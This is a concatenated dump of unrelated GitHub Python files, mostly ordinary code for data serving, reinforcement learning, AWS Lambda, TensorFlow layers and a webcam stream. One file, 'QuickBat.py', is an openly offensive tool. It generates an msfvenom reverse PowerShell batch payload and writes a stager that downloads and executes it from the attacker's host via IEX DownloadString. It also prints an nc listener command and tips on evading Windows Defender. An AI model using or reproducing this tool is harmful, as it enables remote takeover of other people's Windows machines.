msg_id, 'msg': {'progress': 1.0}})\n encoding = Encoding()\n results = encoding.encode_list('vaex-task-result', results)\n await self.write_json({'msg_id': msg_id, 'msg': {'result': results}}, encoding)\n elif command == 'cancel':\n try:\n tasks = self._msg_id_to_tasks[msg['cancel_msg_id']]\n except KeyError:\n pass # already done, or cancelled\n else:\n for task in tasks:\n task.cancel()\n elif command == 'call-dataframe':\n df = self.service[msg['df']].copy()\n df.state_set(msg['state'], use_active_range=True, trusted=trusted)\n # TODO: yield\n if msg['method'] not in vaex.server.dataframe.allowed_method_names:\n raise NotImplementedError(\"Method is not rmi invokable\")\n results = self.service._rmi(df, msg['method'], msg['args'], msg['kwargs'])\n encoding = Encoding()\n if msg['method'] == \"_evaluate_implementation\":\n results = encoding.encode('vaex-evaluate-result', results)\n else:\n results = encoding.encode('vaex-rmi-result', results)\n await self.write_json({'msg_id': msg_id, 'msg': {'result': results}}, encoding)\n else:\n raise ValueError(f'Unknown command: {command}')\n\n except Exception as e:\n logger.exception(\"Exception while handling msg\")\n msg = exception(e)\n await self.write_json({'msg_id': msg_id, 'msg': msg})\n\n async def write_json(self, msg, encoding=None):\n encoding = encoding or Encoding()\n logger.debug(\"writing json: %r\", msg)\n try:\n return await self.send(serialize(msg, encoding))\n except: # noqa\n logger.exception('Failed to write: %s', msg)\n\n def on_close(self):\n logger.debug(\"WebSocket closed\")\n","repo_name":"vaexio/vaex","sub_path":"packages/vaex-server/vaex/server/websocket.py","file_name":"websocket.py","file_ext":"py","file_size_in_byte":6582,"program_lang":"python","lang":"en","doc_type":"code","stars":8057,"dataset":"github-code","pt":"53"} +{"seq_id":"41031437458","text":"import numpy as np\nimport torch\nfrom poutyne import Model\nfrom torch.nn import functional as F\n\nclass Fusion_network(torch.nn.Module):\n\n def __init__(self, models, n_actions, in_dim, out_dim, n_hidden_layers=3, hidden_dim=64):\n self.models = models\n self.n_models = len(models)\n self.n_actions = n_actions\n self.memory_size=1\n super().__init__()\n layers = [torch.nn.Linear(in_dim+self.n_models*self.n_actions, hidden_dim), torch.nn.ReLU()]\n #layers = [torch.nn.Linear(in_dim, hidden_dim), torch.nn.ReLU()]\n for _ in range(n_hidden_layers - 1):\n layers.extend([torch.nn.Linear(hidden_dim, hidden_dim), torch.nn.ReLU()])\n layers.append(torch.nn.Linear(hidden_dim, out_dim))\n #layers.append(torch.nn.Softmax())\n\n self.fa = torch.nn.Sequential(*layers)\n\n def get_actions(self, state):\n batch_size = state.shape[0]\n pred_actions = np.zeros((batch_size, self.n_models, self.n_actions))\n for i in range(self.n_models):\n a = self.models[i].predict(state[:, -self.models[i].network.memory_size:])\n\n\n #print(a.shape)\n pred_actions[:,i] = a\n pred_actions = pred_actions#/np.linalg.norm(pred_actions, axis=-1)[:,:,np.newaxis]\n return pred_actions \n \n def format_states_actions(self, state, pred_actions):\n #print(state[:,-1].shape, pred_actions.reshape((pred_actions.shape[0],-1)).shape)\n #print(np.concatenate((pred_actions.reshape((pred_actions.shape[0],-1)), state[:,-1]), axis=-1).shape)\n return torch.cat((pred_actions.reshape((pred_actions.shape[0],-1)), state[:,-1]), dim=-1)\n \n def forward(self, state, return_weights=False):\n pred_actions = torch.from_numpy(self.get_actions(state))\n \n state_preds = self.format_states_actions(state, pred_actions)\n attn = self.fa(state_preds.float())#state.float()[:,-1])\n attn = torch.nn.functional.softmax(attn/1000, dim=-1)\n weighted_sum = torch.sum(attn.unsqueeze(-1)*pred_actions, axis=1)\n #print(attn[0])\n self.last_preds = weighted_sum\n self.last_attn = attn\n return weighted_sum\n \nclass Attention_ensemble(Model):\n def __init__(self, actions, models, weight_models=False, normalize_preds = False, *args, **kwargs):\n self.actions = actions\n self.models = models\n self.n_models = len(self.models)\n self.n_actions = len(self.actions)\n self.normalize_preds = normalize_preds\n self.weight_models = weight_models\n\n super().__init__(*args, **kwargs)\n def get_action(self, state, epsilon = 0, return_values = False):\n #print(state.shape)\n if np.random.random() < epsilon:\n return np.random.choice(self.actions)\n \n else:\n actions = self.predict(state[np.newaxis])\n return np.argmax(actions)\n\n def format_states_actions(self, state, pred_actions):\n return np.concatenate((pred_actions.reshape((pred_actions.shape[0],-1)), state[:,-1]), axis=-1)\n\n def soft_update(self, other, tau):\n \"\"\"\n Code for the soft update between a target network (self) and\n a source network (other).\n\n The weights are updated according to the rule in the assignment.\n \"\"\"\n new_weights = {}\n\n own_weights = self.get_weight_copies()\n other_weights = other.get_weight_copies()\n\n for k in own_weights:\n #print(own_weights[k].shape, other_weights[k].shape)\n new_weights[k] = (1 - tau) * own_weights[k] + tau * other_weights[k]\n self.set_weights(new_weights)","repo_name":"JeremieGince/Mixture_models_Deep_RL","sub_path":"Ensemble/attn_ensemble.py","file_name":"attn_ensemble.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24232053945","text":"def order(arr1):\n if len(arr1)<2:\n return arr1\n mid=arr1[len(arr1)//2]\n left=[]\n right=[]\n arr1.remove(mid)\n for i in arr1:\n if i <=mid:\n left.append(i)\n else:\n right.append(i)\n return order(left)+[mid]+order(right)\n\nprint(order([11, 99, 33, 69, 77, 88, 55, 11, 33, 36, 39, 66, 44, 22]))","repo_name":"liucheng2912/py","sub_path":"kc/ui/qs1.py","file_name":"qs1.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38032485580","text":"import json\r\nimport boto3\r\nimport base64\r\nimport io\r\nimport cv2\r\nimport numpy as np\r\nfrom PIL import Image\r\n\r\ndef lambda_handler(event, context):\r\n rekognition = boto3.client('rekognition', region_name='ap-northeast-1')\r\n mqttmessage = boto3.client('iot-data', region_name='ap-northeast-1')\r\n dynamodb = boto3.resource('dynamodb')\r\n table = dynamodb.Table('escaperoom-ImageTable8000B8A1-6LFZ1GJM4KI9')\r\n data = event['base64_image'] \r\n base64_decoded = base64.b64decode(data)\r\n image = Image.open(io.BytesIO(base64_decoded))\r\n opencv_img= cv2.cvtColor(np.array(image), cv2.COLOR_BGR2RGB)\r\n\r\n text_image = Image.fromarray(opencv_img)\r\n text_bytes_arr = io.BytesIO()\r\n text_image.save(text_bytes_arr, format='JPEG')\r\n text_bytes = text_bytes_arr.getvalue()\r\n response = rekognition.recognize_celebrities(\r\n Image={'Bytes':text_bytes})\r\n print('procesing image ....')\r\n if response['CelebrityFaces']:\r\n if response['CelebrityFaces'][0]['Name'] == \"Werner Vogels\":\r\n status = \"OK - Authorized Personnel Detected\"\r\n responsemqtt = mqttmessage.publish( topic='$aws/things/escaperoom/celebrityrekognition/status', qos=1, payload=json.dumps({\"status\":status}) )\r\n cv2.putText(opencv_img, status, (10, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 0), 3)\r\n retval, buffer = cv2.imencode('.jpg', cv2.resize(opencv_img, (1280, 736)))\r\n base64_image = str(base64.b64encode(buffer))\r\n base64_image = base64_image[:-1]\r\n base64_image = base64_image[2:]\r\n table.update_item(Key={\"key\": \"cameraImage\",},UpdateExpression=\"set image = :g\",ExpressionAttributeValues={':g': json.dumps(base64_image)},ReturnValues=\"UPDATED_NEW\") \r\n return status\r\n else:\r\n status = \"ERROR - No Authorized Personnel Detected\"\r\n responsemqtt = mqttmessage.publish( topic='$aws/things/escaperoom/celebrityrekognition/status', qos=1, payload=json.dumps({\"status\":status}) )\r\n cv2.putText(opencv_img, status, (10, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 0, 255), 3)\r\n retval, buffer = cv2.imencode('.jpg', cv2.resize(opencv_img, (1280, 736)))\r\n base64_image = str(base64.b64encode(buffer))\r\n base64_image = base64_image[:-1]\r\n base64_image = base64_image[2:]\r\n table.update_item(Key={\"key\": \"cameraImage\",},UpdateExpression=\"set image = :g\",ExpressionAttributeValues={':g': json.dumps(base64_image)},ReturnValues=\"UPDATED_NEW\")\r\n print('NO Authorized person update new environment ')\r\n return status\r\n \r\n \r\n\r\n \r\n\r\n","repo_name":"wahaiya/EscapeRoom-GreenGrass","sub_path":"lambda/escaperoom-celebrity-rekognition-process/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5522738106","text":"import torch\nfrom tqdm import tqdm\n\nfrom constants import ModesSGP\nfrom lib_task.common import compute_expected_p_vec\n\n\ndef concat_params_and_weights(param_cat, weights, n_nodes):\n param_opt_nodes = torch.reshape(param_cat, (n_nodes, -1))\n return torch.cat((param_opt_nodes, torch.reshape(weights, (-1, 1))), dim=1).reshape(-1)\n\n\ndef split_params_and_weights(param_weight_cat, n_nodes):\n param_weight_nodes = torch.reshape(param_weight_cat, (n_nodes, -1))\n weights = param_weight_nodes[:, -1]\n params_biased = param_weight_nodes[:, :-1]\n return torch.flatten(params_biased), weights\n\n\ndef kron_matrix_vector_prod(v, A, B=None):\n # kron(A, B) @ v = vec(B @ vec^-1(v) @ A.T)\n # V = vec^-1(v)\n # V is transposed between numpy implementation and math in the paper\n V = torch.reshape(v, (A.shape[1], -1))\n if B is None: # B is assumed to be identity matrix\n return torch.flatten(A @ V)\n else:\n raise NotImplementedError\n\n\ndef kron_diag_matrix_vector_prod(v, u):\n # kron(diag(u), I) @ v = vec(vec^-1(v) * u)\n # V = vec^-1(v)\n V = torch.reshape(v, (u.shape[0], -1))\n return torch.flatten((V.T.contiguous() * u).T.contiguous())\n\n\ndef compute_expected_p_mat(graph, models):\n # sample edges\n p_vecs = []\n for idx_from, model in tqdm(enumerate(models)):\n p_vec = compute_expected_p_vec(model, graph)\n p_vecs.append(p_vec)\n return torch.vstack(p_vecs).T.contiguous()\n\ndef get_current_p_mat(graph, models):\n # sample edges\n p_vecs = []\n for idx_from, model in enumerate(models):\n are_connected = graph.are_connected(idx_from)\n p_vec = model.get_p_vec(are_connected)\n p_vecs.append(p_vec)\n return torch.vstack(p_vecs).T.contiguous()\n\ndef compute_loss_sum(clients, inputs_nodes, idxs_sample_nodes=None, to_node=None, train_logger=None):\n loss_sum = 0.\n for client, inputs, idxs_sample in zip(clients, inputs_nodes, idxs_sample_nodes):\n kwargs_loss = client.get_kwargs_loss(inputs, idxs_sample)\n loss = client.model.loss(inputs, **kwargs_loss)\n loss_sum += loss\n if train_logger is not None:\n train_logger.record_step_value(client.gossip.idx_node, 'loss', loss.item())\n\n return loss_sum\n\n\ndef update_param_cat_biased(clients, param_cat_biased, param_cat_debiased, inputs_nodes, idxs_sample_nodes, P, lr_cat, create_graph, mode_sgp, train_logger=None):\n if train_logger is not None:\n for idx_node, lr in enumerate(lr_cat):\n train_logger.record_step_value(idx_node, 'lr', lr.item())\n\n loss_sum = compute_loss_sum(clients, inputs_nodes, idxs_sample_nodes=idxs_sample_nodes, train_logger=train_logger)\n # param update\n grad = torch.autograd.grad(loss_sum, param_cat_debiased, create_graph=create_graph)[0]\n if mode_sgp == ModesSGP.ASSRAN:\n # x = P (x - A * g (z, lambda))\n param_cat_biased_updated = kron_matrix_vector_prod(param_cat_biased - kron_diag_matrix_vector_prod(grad, lr_cat), P)\n elif mode_sgp == ModesSGP.NEDIC:\n # x = P x - A * g (z, lambda)\n param_cat_biased_updated = kron_matrix_vector_prod(param_cat_biased, P) - kron_diag_matrix_vector_prod(grad, lr_cat)\n else:\n raise ValueError(mode_sgp)\n\n return param_cat_biased_updated\n","repo_name":"hitachi-rd-cv/pdbo-hgp","sub_path":"lib_task/concat_hgp.py","file_name":"concat_hgp.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"37576019522","text":"import pycuda.driver as cuda\nfrom pycuda.compiler import SourceModule\nimport os\nimport numpy as np\nimport pycuda.compiler as nvcc\nimport pycuda.compiler as nvcc\nimport pycuda.gpuarray as gpu\nimport pycuda.driver as cu\nimport pycuda.autoinit\n\n_path = r'E:\\Microsoft Visual Studio\\2019\\Community\\VC\\Tools\\MSVC\\14.29.30133\\bin\\Hostx64\\x64'\nif os.system(\"cl.exe\"):\n os.environ['PATH'] += ';' + _path\nif os.system(\"cl.exe\"):\n raise RuntimeError(\"cl.exe still not found, path probably incorrect\")\n\nmod = SourceModule(\"\"\"\n__global__ void doublify(float *a)\n{\nint idx = threadIdx.x + threadIdx.y*4;\na[idx] *= 2;\n}\n\"\"\")\n\na = np.random.randn(16, 16)\na = a.astype(np.float32)\na_gpu = cuda.mem_alloc(a.nbytes) # 在GPU上为a分配所需的显存\ncuda.memcpy_htod(a_gpu, a) # 将数据转移到 GPU\n\nfunc = mod.get_function(\"doublify\")\nfunc(a_gpu, block=(16, 16, 1))\n\na_doubled = np.empty_like(a)\ncuda.memcpy_dtoh(a_doubled, a_gpu)\nprint(a_doubled)\nprint(a)\n","repo_name":"PangHaowen-hub/segment_registration","sub_path":"test_pycuda.py","file_name":"test_pycuda.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2597026852","text":"from PyQt5 import QtGui, QtWidgets\n\nfrom ui import Ui_QMainWindow\n\n\nclass MainDialog(QtWidgets.QDialog):\n\n def __init__(self):\n\n QtWidgets.QDialog.__init__(self)\n self.ui = Ui_QMainWindow()\n self.ui.setupUi(self)\n logo = QtGui.QImage(\"image/nculogo.jpg\")\n logo = logo.scaled(200,200)\n self.ui.label.setPixmap(QtGui.QPixmap(logo))\n self.ui.label.resize(300,300)\n self.ui.pushButton_2.clicked.connect(self.PushButtonClicked2)\n\n def PushButton1Clicked(self):\n box = QtWidgets.QMessageBox()\n box.warning(self, \"提示\", \"这是一个按钮事件\")\n\n\n\n def PushButtonClicked2(self):\n from detect import main\n main()\n\n\nimport sys\nif __name__=='__main__':\n app=QtWidgets.QApplication(sys.argv)\n Form=MainDialog()\n Form.show()\n Form.ui.pushButton.clicked.connect(Form.PushButtonClicked2)\n sys.exit(app.exec_())","repo_name":"YingkaiFu/Object_Detection_Tensorflow","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12645597130","text":"import json\nimport boto3\nimport os\n\ndynamodb = boto3.client('dynamodb')\n\ndef handle(event, context):\n \n uid = event['requestContext']['connectionId']\n message = json.loads(event['body'])['message']\n \n paginator = dynamodb.get_paginator('scan')\n connectionIds = []\n\n apigatewaymanagementapi = boto3.client('apigatewaymanagementapi', \n endpoint_url = \"https://\" + event[\"requestContext\"][\"domainName\"] + \"/\" + event[\"requestContext\"][\"stage\"])\n for page in paginator.paginate(TableName=os.environ['SOCKET_CONNECTIONS_TABLE_NAME']):\n connectionIds.extend(page['Items'])\n\n response = {\n 'action': 'onMessage',\n 'message': {\n 'message-type': 'chat',\n 'yourself': False,\n 'message': message\n }\n }\n # Emit the recieved message to all the connected devices\n for connectionId in connectionIds:\n if connectionId['name']['S']:\n response['message']['yourself'] = True if uid == connectionId['connectionId']['S'] else False\n apigatewaymanagementapi.post_to_connection(\n Data=json.dumps(response),\n ConnectionId=connectionId['connectionId']['S']\n )\n\n return {}","repo_name":"edwardhorsey/serverless-chat-app","sub_path":"websocket/on_message_handler.py","file_name":"on_message_handler.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75249486568","text":"import tensorflow as tf\nimport numpy as np\n\n\ndef conv_relu_layer(ftmps, hparams, weights, name, init_weights):\n kernel_val, bias_val = init_weights[name]\n kernel_initializer = tf.constant_initializer(kernel_val)\n bias_initializer = tf.constant_initializer(bias_val)\n\n with tf.variable_scope(name):\n kernel = tf.get_variable(\"kernel\",\n shape=kernel_val.shape,\n initializer=kernel_initializer,\n regularizer=_regularizer(hparams))\n bias = tf.get_variable(\"bias\",\n shape=bias_val.shape,\n initializer=bias_initializer)\n weights[name] = kernel, bias\n\n conv = tf.nn.conv2d(ftmps, kernel, (1, 1, 1, 1), \"SAME\", name=\"conv\")\n relu = tf.nn.relu(conv + bias, name=\"relu\")\n\n return relu\n\n\ndef fc2conv_layer(\n ftmps, hparams, weights, use_dropout, name, new_shape, init_weights):\n kernel_val, bias_val = init_weights[name]\n kernel_val = kernel_val.reshape(new_shape)\n kernel_initializer = tf.constant_initializer(kernel_val)\n bias_initializer = tf.constant_initializer(bias_val)\n\n with tf.variable_scope(name):\n kernel = tf.get_variable(\"kernel\",\n shape=kernel_val.shape,\n initializer=kernel_initializer,\n regularizer=_regularizer(hparams))\n bias = tf.get_variable(\"bias\",\n shape=bias_val.shape,\n initializer=bias_initializer)\n weights[name] = kernel, bias\n\n conv = tf.nn.conv2d(ftmps, kernel, (1, 1, 1, 1), \"SAME\", name=\"conv\")\n relu = tf.nn.relu(conv + bias, name=\"relu\")\n\n if use_dropout:\n return tf.nn.dropout(relu, hparams.keep_prob, name=\"dropout\")\n else:\n return relu\n\n\ndef project_layer(ftmps, hparams, weights, out_depth, name, init_weights):\n in_depth = ftmps.get_shape().as_list()[3]\n\n if name in init_weights:\n kernel_val, bias_val = init_weights[name]\n kernel_initializer = tf.constant_initializer(kernel_val)\n bias_initializer = tf.constant_initializer(bias_val)\n else:\n kernel_initializer = tf.zeros_initializer()\n bias_initializer = tf.zeros_initializer()\n\n with tf.variable_scope(name):\n kernel = tf.get_variable(\"kernel\",\n shape=(1, 1, in_depth, out_depth),\n initializer=kernel_initializer,\n regularizer=_regularizer(hparams))\n bias = tf.get_variable(\"bias\",\n shape=(out_depth,),\n initializer=bias_initializer)\n weights[name] = kernel, bias\n\n conv = tf.nn.conv2d(ftmps, kernel, (1, 1, 1, 1), \"SAME\", name=\"conv\")\n return conv + bias\n\n\ndef upsample_layer(ftmps,\n hparams, weights, upsample_factor, output_shape, name, init_weights):\n\n if name in init_weights:\n kernel_val = init_weights[name][0]\n kernel_initializer = tf.constant_initializer(kernel_val)\n else:\n depth = ftmps.get_shape().as_list()[3]\n kernel_val = _get_bilinear_weights(upsample_factor, depth)\n kernel_initializer = tf.constant_initializer(kernel_val)\n\n strides = 1, upsample_factor, upsample_factor, 1\n\n with tf.variable_scope(name):\n kernel = tf.get_variable(\"kernel\",\n shape=kernel_val.shape,\n initializer=kernel_initializer,\n trainable=hparams.train_upsample_weights)\n weights[name] = (kernel,)\n\n conv_transposed = tf.nn.conv2d_transpose(ftmps,\n filter=kernel,\n output_shape=output_shape,\n strides=strides,\n padding=\"SAME\",\n name=name)\n return conv_transposed\n\n\ndef _get_bilinear_weights(upsample_factor, num_classes):\n\n kernel_size = upsample_factor * 2 - upsample_factor % 2\n weights_val = np.zeros((kernel_size, kernel_size, num_classes, num_classes),\n dtype=np.float32)\n\n factor = (kernel_size + 1) // 2\n if kernel_size % 2 == 1:\n center = factor - 1\n else:\n center = factor - 0.5\n\n og = np.ogrid[:kernel_size, :kernel_size]\n\n kernel_val = ((1 - abs(og[0] - center) / factor) *\n (1 - abs(og[1] - center) / factor))\n\n for i in range(num_classes):\n weights_val[:, :, i, i] = kernel_val\n\n return weights_val\n\n\ndef _regularizer(hparams):\n return tf.contrib.layers.l2_regularizer(scale=hparams.weight_decay)\n","repo_name":"chao-ji/tf-fcn8s","sub_path":"pascal/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27819914073","text":"kaas = input(\"is de kaas geel?\")\nif kaas == \"yes\":\n wat = input(\"zitten er gaten in?\")\n if wat == \"yes\":\n wat = input(\"is de kaas belachelijk duur?\")\n if wat == \"yes\":\n print(\"emmenthaler\")\n elif wat == \"no \":\n print(\"leerdammer\")\n elif wat == \"no\":\n wat = input(\" is de kaas hard als steen?\")\n if wat == \"yes\":\n print(\"pamnigiano reggiano\")\n elif wat == \"no\":\n print (\"goudse kaas\")\nelif kaas == \"no\":\n kaas = input(\"heeft fr kaas blaouwe shimmels?\")\n if kaas == \"yes\":\n kaas = input(\"heeft de kaas een korst?\")\n if kaas == \"yes\":\n print(\"bleu de rochbaron\")\n elif kaas == \"no\":\n kaas = input(\"heeft de kaas een korst\")\n if kaas == \"yes\":\n print(\" camembert\")\n elif kaas == \"no\":\n print(\"Mozzarella\")\nelse:\n print(\"u have to (say yes or no) \")\n \n \n\n\n\n\n\n\n\n \n \n\n\n","repo_name":"ObaidaKurea/werken-met-condities","sub_path":"kaas .py","file_name":"kaas .py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7848799886","text":"from flask.templating import render_template\nfrom imutils.video import VideoStream\nfrom flask_socketio import SocketIO\nfrom time import time, sleep\nfrom flask import Response\nfrom flask import Flask\nimport threading\nimport argparse\nimport imutils\nimport dotenv\nimport cv2\n\nWIDTH = 640\nHEIGHT = 480\nRS_WIDTH = int(WIDTH / 1.6)\nRS_HEIGHT = int(HEIGHT / 1.6)\n\n# Init output and thread lock\noutput_frame = None\nlock = threading.Lock()\n\n# Init app and camera\napp = Flask(__name__)\nsocketio = SocketIO(app, cors_allowed_origins=\"*\")\nvs = VideoStream(src=0).start()\n\n# Motion alert emit limit\nemit_limit = 30\n\nclass MotionDetector:\n def __init__(self, accumWeight=0.5) -> None:\n self.accumWeight = accumWeight\n self.bg = None\n\n def update(self, image):\n if self.bg is None:\n self.bg = image.copy().astype(\"float\")\n return\n cv2.accumulateWeighted(image, self.bg, self.accumWeight)\n \n def detect(self, image, t_val=25):\n # Get diff between bg and image per threshold\n delta = cv2.absdiff(self.bg.astype(\"uint8\"), image)\n threshold = cv2.threshold(delta, t_val, 255, cv2.THRESH_BINARY)[1]\n\n # Distort image to eradicate false positives\n threshold = cv2.erode(threshold, None, iterations=1)\n threshold = cv2.dilate(threshold, None, iterations=1)\n\n # Contours of motion\n contours = cv2.findContours(threshold, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0]\n\n return len(contours) > 0\n\ndef detect_motion(frame_count):\n global output_frame, lock\n md = MotionDetector(0.5)\n \n next_emit = time() + emit_limit\n\n # Construct bg\n for _ in range(frame_count):\n with lock:\n frame = output_frame.copy()\n gray = imutils.resize(frame, width=RS_WIDTH, height=RS_HEIGHT)\n gray = cv2.cvtColor(gray, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (7, 7), 0)\n md.update(gray)\n\n # Run MotionDetector once every second (unless fn takes longer)\n while True:\n start = time()\n with lock:\n frame = output_frame.copy()\n gray = imutils.resize(frame, width=RS_WIDTH, height=RS_HEIGHT)\n gray = cv2.cvtColor(gray, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (7, 7), 0)\n\n motion = md.detect(gray)\n md.update(gray)\n\n ts = time()\n if motion and ts > next_emit:\n socketio.emit(\"motion\")\n next_emit = ts + emit_limit\n\n sleep(max(0, 1 - (ts - start)))\n\ndef get_frame():\n global vs, output_frame, lock\n while True:\n ts = time()\n with lock:\n output_frame = vs.read()\n\n # Max 25 FPS\n sleep(max(0, 0.04 - (time() - ts)))\n\ndef generate():\n global output_frame, lock\n params = [cv2.IMWRITE_JPEG_QUALITY, 80]\n while True:\n with lock:\n if output_frame is None:\n continue\n \n success, encoded_img = cv2.imencode(\".jpg\", output_frame, params)\n if not success:\n continue\n \n yield(b\"--frame\\r\\n\" b\"Content-Type: image/jpeg\\r\\n\\r\\n\" + bytearray(encoded_img) + b\"\\r\\n\")\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/video_feed\")\ndef video_feed():\n return Response(generate(), mimetype=\"multipart/x-mixed-replace; boundary=frame\")\n\nif __name__ == \"__main__\":\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-i\", \"--ip\", type=str, required=True, help=\"IP Address of the device\")\n ap.add_argument(\"-p\", \"--port\", type=int, required=True, help=\"Port number of the server (1024 to 65535)\")\n ap.add_argument(\"-f\", \"--frame_count\", type=int, required=False, help=\"Number of frames to construct background (if using motion detection)\")\n args = vars(ap.parse_args())\n args[\"frame_count\"] = args[\"frame_count\"] or 32\n print(args)\n \n t1 = threading.Thread(target=get_frame, name=\"StreamCapture\")\n t1.daemon = True\n t1.start()\n\n t2 = threading.Thread(target=detect_motion, name=\"MotionDetector\", args=(args[\"frame_count\"],))\n t2.daemon = True\n t2.start()\n\n socketio.run(app, host=args[\"ip\"], port=args[\"port\"], debug=False)\n # app.run(host=args[\"ip\"], port=args[\"port\"], debug=False)\n\n# Release VideoStream pointer\n# vs.stop()","repo_name":"vjohannesb/baby-monitor","sub_path":"webstream/webstream.py","file_name":"webstream.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18251890733","text":"import sys\ninput = sys.stdin.readline\n\nlength = int(input())\nN = list(map(int, input().split()))\noperator = list(map(int, input().split())) # [+, -, *, /]\n\ndef calc(op, pre, cur):\n if op == 0:\n return pre + cur\n if op == 1:\n return pre - cur\n if op == 2:\n return pre * cur\n if op == 3:\n if pre < 0 or cur < 0:\n return -(abs(pre) // abs(cur))\n return pre // cur\n\ndef backtracking(idx : int, num : int) -> int:\n # idx : 수열 N에서 현재 위치\n # num : 현재까지 누적된 결과값\n if idx == len(N):\n return [num, num]\n min_val = sys.maxsize\n max_val = -1000000001\n\n for i in range(4):\n if operator[i] == 0:\n continue\n operator[i] -= 1\n a, b = backtracking(idx + 1, calc(i, num, N[idx]))\n max_val = max(a, max_val)\n min_val = min(b, min_val)\n operator[i] += 1\n\n return [max_val, min_val]\n\nanswer = backtracking(1, N[0])\nfor a in answer:\n print(a)\n","repo_name":"Just-NB/Algorithm","sub_path":"Baekjoon/부르트포스/Silver/14888_연산자 끼워넣기.py","file_name":"14888_연산자 끼워넣기.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38687296181","text":"import os\n\nrun = os.system\nru2 = os.popen\ntxtgreen = '\\033[32m'\ntxtred = '\\033[31m'\ntxtgreen = '\\033[32m'\ntxtyellow = '\\033[33m'\ntxtwhite = '\\033[37m'\ntxtcyan = '\\033[36m'\n\ndef main():\n\tprint(txtgreen + '''\n\n________ .__ __ __________ __ \n\\_____ \\ __ __|__| ____ | | _\\______ \\_____ _/ |_ \n / / \\ \\| | \\ |/ ___\\| |/ /| | _/\\__ \\| __\\ \n/ \\_/. \\ | / \\ \\___| < | | \\ / __ \\| | \n\\_____\\ \\_/____/|__|\\___ >__|_ \\|______ /(____ /__| \n \\__> \\/ \\/ \\/ \\/ \n {}RawVendetta -Version1.3{} \n'''.format(txtyellow, txtwhite) + txtwhite)\n\tcontext = os.popen('ip r').read()\n\tinitdata = context.split('src ', 1)\n\tupdata = initdata[1].split(' metric')\n\tlhost = updata[0]\n\tprint('lhost:', lhost)\n\tlport = str(input('Enter Port To Listen On:'))\n\tbname = str(input('Name of file(.bat):'))\n\tbatchname = bname + '.bat'\n\tstagername = bname + 'Update&Setup'\n\tstagerfname = stagername + '.bat'\n\tcommand = 'msfvenom -p cmd/windows/reverse_powershell lhost=' + lhost + ' lport=' + lport + ' > ' + bname + '.bat'\n\taskps = 'nc -lvp ' + lport\n\trun(command)\n\tprint(txtgreen + '\\nGenerating File...\\n' + txtwhite)\n\tprint(txtgreen + 'File Created: ' + bname + '.bat\\nHost ' + lhost + ' is listening on: ' + lport + '\\n' + txtyellow + '\\nTo connect to a remote machine, that machine needs to run the following:\\npowershell -c \"IEX((New-Object System.Net.WebClient).DownloadString(\\'http://'+ lhost + '/' + bname + '.bat\\'))\\n\\nThe above command will have their machine download the files and run it from their computer assuming you are hosting the server there.\\n' + txtwhite)\n\tprint(txtyellow + '!!!' + txtwhite + 'Run \"' + askps + '\" to listen for a connection' + txtyellow + '!!!\\n' + txtwhite)\n\tprint(txtgreen + 'Generating stager: ' + stagerfname + txtwhite)\n\tfile1 = open(stagerfname, 'x')\n\tfile1.close()\n\tmakestager = open(stagerfname, 'a')\n\tmakestager.write('powershell -c \"IEX((New-Object System.Net.WebClient).DownloadString(\\'http://' + lhost + '/' + batchname + '\\'))')\n\tmakestager.close()\n\treadstager = open(stagerfname, 'r')\n\tprint('Wrote the following payload to stager named:' + stagername + '\\ncontaining the following string:\\n' + readstager.read())\n\treadstager.close()\n\tprint('\\nThe client needs to download and execute the stager:' + stagerfname + ' and reverse shell:' + bname)\n\tprint(txtyellow + '\\nAdditional Info:\\nRunning the stager will download the batch reverse shell on the remote machine.\\nYou can run the batch reverse shell standalone, but its not very likely to bypass windows defender this way unless downloaded and installed to a protected folder on a windows operating system.' + txtwhite)\nmain()\n","repo_name":"RawVendetta/QuickBat","sub_path":"QuickBat.py","file_name":"QuickBat.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1207434683","text":"import os\nimport smtplib\nfrom email import encoders\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom datetime import date, timedelta, datetime\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.application import MIMEApplication\n\n\ntoday = datetime.now().strftime(r'%y%m%d') # today's date format YYMMDD\n\n\ndef sendmail_with_html_and_attachment(html_content, mail_subject, attach_files=None):\n \"\"\"\n * Send Mail Alerts With Html Content & Attachments\n \"\"\"\n me = 